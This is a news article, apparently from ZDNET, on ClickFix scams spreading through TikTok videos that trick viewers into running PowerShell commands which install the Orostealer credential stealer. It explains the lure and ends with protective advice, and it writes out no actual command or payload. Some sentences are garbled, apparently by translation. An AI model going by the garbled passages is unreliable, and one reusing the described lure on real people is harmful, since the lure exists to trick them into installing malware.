Follow ZDNET: Add us as a favorite source On Google.
ZDNET Highlights
- TikTok is a delivery platform for clickfix social engineering attacks.
- We found live video examples of the scam for Photoshop and Windows.
- ClickFix is a popular new method of choice for threat actors.
TikTok is being used as a delivery platform to spread information-stealing malware and other payloads, with free software serving as bait.
Senior ISC handler Xavier Mertens on 17 October said in a post Published on the SANS Institute’s Internet Storm Center website, the wave of attacks on TikTok leveraged Clickfix social engineering techniques to trick victims into downloading malware on their systems.
Too: This new cyber attack tempts you to hack yourself. Here’s how to recognize it
In the example video posted by Mertens, a scammer has posted content – with over 500 likes – that pretends to offer viewers an easy way to activate Photoshop for free.
The victim is asked to start Powershell as an administrator and trigger a line of code, which then executes “Updater.exe”, which is actually Orostealer, a Trojan designed to steal credentials and system information. An additional shellcode is also launched in memory.
ZDNET searched TikTok for similar videos and was surprised by how many were live. For example, in the screenshot below, the author was promoting a fake way to download and install Adobe Photoshop without requiring a license. Other examples we found include fake, free ways to license Microsoft Windows.
What is Clickfix?
Clickfix is a particularly nasty social engineering technique that attempts to bypass traditional anti-phishing protections by tricking users into “hacking” themselves.
Also: Best VPN Services 2025: Fastest VPNs with the Best Networks, Ranked
Instructions are given in some form, which may include using a Windows shortcut and copy-pasting a snippet of code into the command prompt to trigger a PowerShell script. These instructions are laid out in a way that is easy to understand and are given a simulated purpose – such as fixing a minor technical glitch, a way to use paid software for free, or as a “life hack” to improve popular streaming services.
Once the victim has unknowingly opened their device to the exploit, a malicious payload is deployed and executed. Malware reported in ClickFix campaigns includes information stealers, remote access trojans (RATs), ransomware, and worms.
Is this the first time TikTok and ClickFix have been linked?
Sadly, no. Back in March, cybersecurity researchers from trend micro It was reported that TikTok videos, potentially generated through AI tools, were being distributed on the platform to spread vids and steal information that steals information. A network of faceless accounts posted videos on topics including improving Spotify and included step-by-step instructions that, instead, launched a PowerShell command to load the malware.
Also: 9 Ways to Remove Yourself from the Internet (And Hide Your Identity Online)
“The massive user base and algorithmic reach of social media platforms provides an ideal delivery mechanism for threat actors,” the researchers said. “For attackers, this means widespread distribution without the logistical burden of maintaining infrastructure.”
Earlier this month, Microsoft warned that ClickFix was becoming increasingly popular as a method to infiltrate networks, steal data and deploy malware.
In the Redmond giant’s latest digital defense report, Microsoft said that since 2024, the ClickFix strategy has been recorded as a method of initial access in 47% of attacks, ahead of phishing and password “spray and pray” attack methods.
How do I protect myself from Clickfix attacks?
If you are not sure about the source of the code or its true purpose, do not execute commands on your device, especially if you found the instructions on social media, where they are unlikely to be scrutinized. Now that you know this social engineering method exists, remain skeptical. Tell your friends also.
